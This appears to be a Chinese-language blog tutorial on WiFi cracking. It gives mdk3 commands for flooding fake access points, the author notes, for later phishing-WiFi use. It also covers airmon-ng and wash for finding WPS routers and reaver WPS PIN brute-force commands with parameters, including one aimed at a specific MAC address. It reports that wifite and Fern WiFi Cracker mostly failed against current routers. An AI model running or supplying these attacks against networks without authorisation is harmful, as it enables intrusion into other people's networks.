之前我们讲过了fluxion和aircrack破解wifi的方法
其实还有很多的wifi破解方式,不妨都试试。知晓每一个工具的优缺点,在合适的情境下去选择最适合的方法
不幸的是下面讲的这些破解方法基本已经成了古董了,只可远观而不可亵玩焉。
因为已经不怎么管用了...
如果想了解wifi历史的人可以继续接着看下去,其他的嘛就快点去看其他文章吧
首先要讲的是这篇文章里唯一还能达到效果的内容
构造很多的虚假wifi
弄这么多不能用的wifi有什么用呢?之后我们在知道钓鱼wifi的时候会用到,这里我们先讲一下
mdk3 wlan1 b -f FakeAPName.txt -c 2
只需要这么一句话
下面开始我的失败尝试了,愿意看的请留下听我讲述历史...
其实看看也好,可以避免你们继续这样失败的尝试,少浪费一些时间
现在路由器防pin真的是防的很好,我pin了至少30次,只pin出来过机房的很老的一台路由器,其他的总是被pin死,看来这11000次也并不想想象中那样脆弱。这是我做完这次实验的感受
一:reaver
reaver是通过路由器上一个叫做wps的功能来实现攻击的,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。
根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。具体的为什么是11000种情况呢?
现在开始实现
1.将网卡调到监听模式
打开终端输入 airmon-ng start wlan0
2.扫描开启wps的路由器。
输入wash -i wlan0mon
WPS Locked为No的就是开启wps服务的路由器,都可以尝试攻击
3.找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver的参数。
reaver 命令:
reaver -i mon0 -b mac -S -v
reaver命令参数:
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c 指定频道可以方便找到信号,如-c1 指定1频道
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
选择之前扫描出来的开启WPS的wifi,选择一个进行破解。
输入:reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。
一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。
使用心得
最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码:reaver -i wlan0mon -b mac -p pin码,来再次得到密码
一般pin的过快,会把路由器pin死,所以一般还会加上-d5 -t5参数,添加5秒延时,当然数值可以自己改。我添加了也照样被pin的死死的。不行了这个软件
再来介绍一个可以批量破解wifi的工具:wifite
很看好他,来试一下
1.打开终端输入wifite
2.我选择了all
3.结果一个也没整出来,他也是用的wps的来破解,现在用wps针对除了很老的路由器,其他的都不是很好办了
最后一个图形化界面的破解软件Fern WiFi Cracker
图形化界面,大家一看就会懂,先选择网卡,扫描,破解
说一下主界面的右下角有一个toolbox工具箱
试试
破解不好用,而且一打开他整个虚拟机都变得有些卡,破解的进度条根本不走
不推荐
我们来试一下他的这些附件
也都不管用,不知道是不是因为使用了https的缘故,反正他现在肯定是out了
参考的一些网站
